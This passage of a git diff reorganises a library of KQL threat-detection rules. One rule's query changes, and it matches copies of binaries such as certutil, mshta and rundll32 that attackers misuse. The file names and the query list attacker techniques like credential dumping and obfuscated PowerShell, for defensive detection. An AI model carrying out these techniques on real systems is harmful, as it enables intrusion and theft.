Access/hacktool_winpwn_execution.kql rename to KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql diff --git a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql similarity index 100% rename from KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql rename to KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql diff --git a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql rename to KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql diff --git a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql b/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_xordump_execution.kql rename to KQL/rules/windows/process_creation/hacktool_xordump_execution.kql diff --git a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql diff --git a/KQL/rules/Defense Evasion/hh_exe_execution.kql b/KQL/rules/windows/process_creation/hh_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hh_exe_execution.kql rename to KQL/rules/windows/process_creation/hh_exe_execution.kql diff --git a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql similarity index 100% rename from KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql rename to KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql diff --git a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql b/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql rename to KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql rename to KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql rename to KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql diff --git a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql similarity index 100% rename from KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql rename to KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql diff --git a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql b/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql similarity index 100% rename from KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql rename to KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql similarity index 100% rename from KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql rename to KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql diff --git a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql rename to KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql similarity index 100% rename from KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql rename to KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql diff --git a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql similarity index 100% rename from KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql rename to KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql diff --git a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql similarity index 100% rename from KQL/rules/Persistence/imports_registry_key_from_a_file.kql rename to KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql diff --git a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql similarity index 100% rename from KQL/rules/Persistence/imports_registry_key_from_an_ads.kql rename to KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql similarity index 100% rename from KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql rename to KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql rename to KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql rename to KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql diff --git a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql rename to KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql diff --git a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql rename to KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql diff --git a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/insecure_transfer_via_curl_exe.kql rename to KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql similarity index 100% rename from KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql rename to KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql similarity index 100% rename from KQL/rules/Execution/installation_of_wsl_kali_linux.kql rename to KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql diff --git a/KQL/rules/Persistence/interactive_at_job.kql b/KQL/rules/windows/process_creation/interactive_at_job.kql similarity index 100% rename from KQL/rules/Persistence/interactive_at_job.kql rename to KQL/rules/windows/process_creation/interactive_at_job.kql diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql similarity index 100% rename from KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql rename to KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql diff --git a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql similarity index 100% rename from KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql rename to KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql diff --git a/KQL/rules/Execution/java_running_with_remote_debugging.kql b/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql similarity index 100% rename from KQL/rules/Execution/java_running_with_remote_debugging.kql rename to KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/windows/process_creation/jscript_compiler_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/jscript_compiler_execution.kql rename to KQL/rules/windows/process_creation/jscript_compiler_execution.kql diff --git a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql rename to KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql diff --git a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql b/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql similarity index 100% rename from KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql rename to KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql diff --git a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql rename to KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql similarity index 100% rename from KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql rename to KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql diff --git a/KQL/rules/Discovery/local_accounts_discovery.kql b/KQL/rules/windows/process_creation/local_accounts_discovery.kql similarity index 100% rename from KQL/rules/Discovery/local_accounts_discovery.kql rename to KQL/rules/windows/process_creation/local_accounts_discovery.kql diff --git a/KQL/rules/Execution/local_file_read_using_curl_exe.kql b/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/local_file_read_using_curl_exe.kql rename to KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql similarity index 100% rename from KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql rename to KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql similarity index 85% rename from KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql rename to KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql index 1b4ef6c4..cb596131 100644 --- a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql +++ b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1036.003 DeviceProcessEvents -| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")) \ No newline at end of file +| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe" or ProcessCommandLine contains "\\ie4uinit.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql rename to KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql diff --git a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql similarity index 100% rename from KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql rename to KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql diff --git a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql similarity index 100% rename from KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql rename to KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql diff --git a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql rename to KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql rename to KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql diff --git a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql diff --git a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql similarity index 100% rename from KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql rename to KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql similarity index 100% rename from KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql rename to KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql diff --git a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql similarity index 100% rename from KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql rename to KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql similarity index 100% rename from KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql rename to KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql diff --git a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql b/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql rename to KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql diff --git a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql similarity index 100% rename from KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql rename to KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql diff --git a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql similarity index 100% rename from KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql rename to KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql diff --git a/KQL/rules/Execution/mmc20_lateral_movement.kql b/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql similarity index 100% rename from KQL/rules/Execution/mmc20_lateral_movement.kql rename to KQL/rules/windows/process_creation/mmc20_lateral_movement.kql diff --git a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql similarity index 100% rename from KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql rename to KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql diff --git a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql b/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql similarity index 100% rename from KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql rename to KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql diff --git a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql b/KQL/rules/windows/process_creation/modify_group_policy_settings.kql similarity index 100% rename from KQL/rules/Defense Evasion/modify_group_policy_settings.kql rename to KQL/rules/windows/process_creation/modify_group_policy_settings.kql diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql similarity index 100% rename from KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql rename to KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql rename to KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql diff --git a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql b/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql similarity index 100% rename from KQL/rules/Persistence/msexchange_transport_agent_installation.kql rename to KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql similarity index 100% rename from KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql rename to KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql rename to KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql similarity index 100% rename from KQL/rules/Defense Evasion/msiexec_quiet_installation.kql rename to KQL/rules/windows/process_creation/msiexec_quiet_installation.kql diff --git a/KQL/rules/Defense Evasion/msiexec_web_install.kql b/KQL/rules/windows/process_creation/msiexec_web_install.kql similarity index 100% rename from KQL/rules/Defense Evasion/msiexec_web_install.kql rename to KQL/rules/windows/process_creation/msiexec_web_install.kql diff --git a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql similarity index 100% rename from KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql rename to KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql diff --git a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql similarity index 100% rename from KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql rename to KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/windows/process_creation/msxsl_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/msxsl_exe_execution.kql rename to KQL/rules/windows/process_creation/msxsl_exe_execution.kql diff --git a/KQL/rules/Execution/net_webclient_casing_anomalies.kql b/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql similarity index 100% rename from KQL/rules/Execution/net_webclient_casing_anomalies.kql rename to KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql diff --git a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql similarity index 100% rename from KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql rename to KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql diff --git a/KQL/rules/Discovery/network_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql similarity index 100% rename from KQL/rules/Discovery/network_reconnaissance_activity.kql rename to KQL/rules/windows/process_creation/network_reconnaissance_activity.kql diff --git a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql rename to KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql diff --git a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql rename to 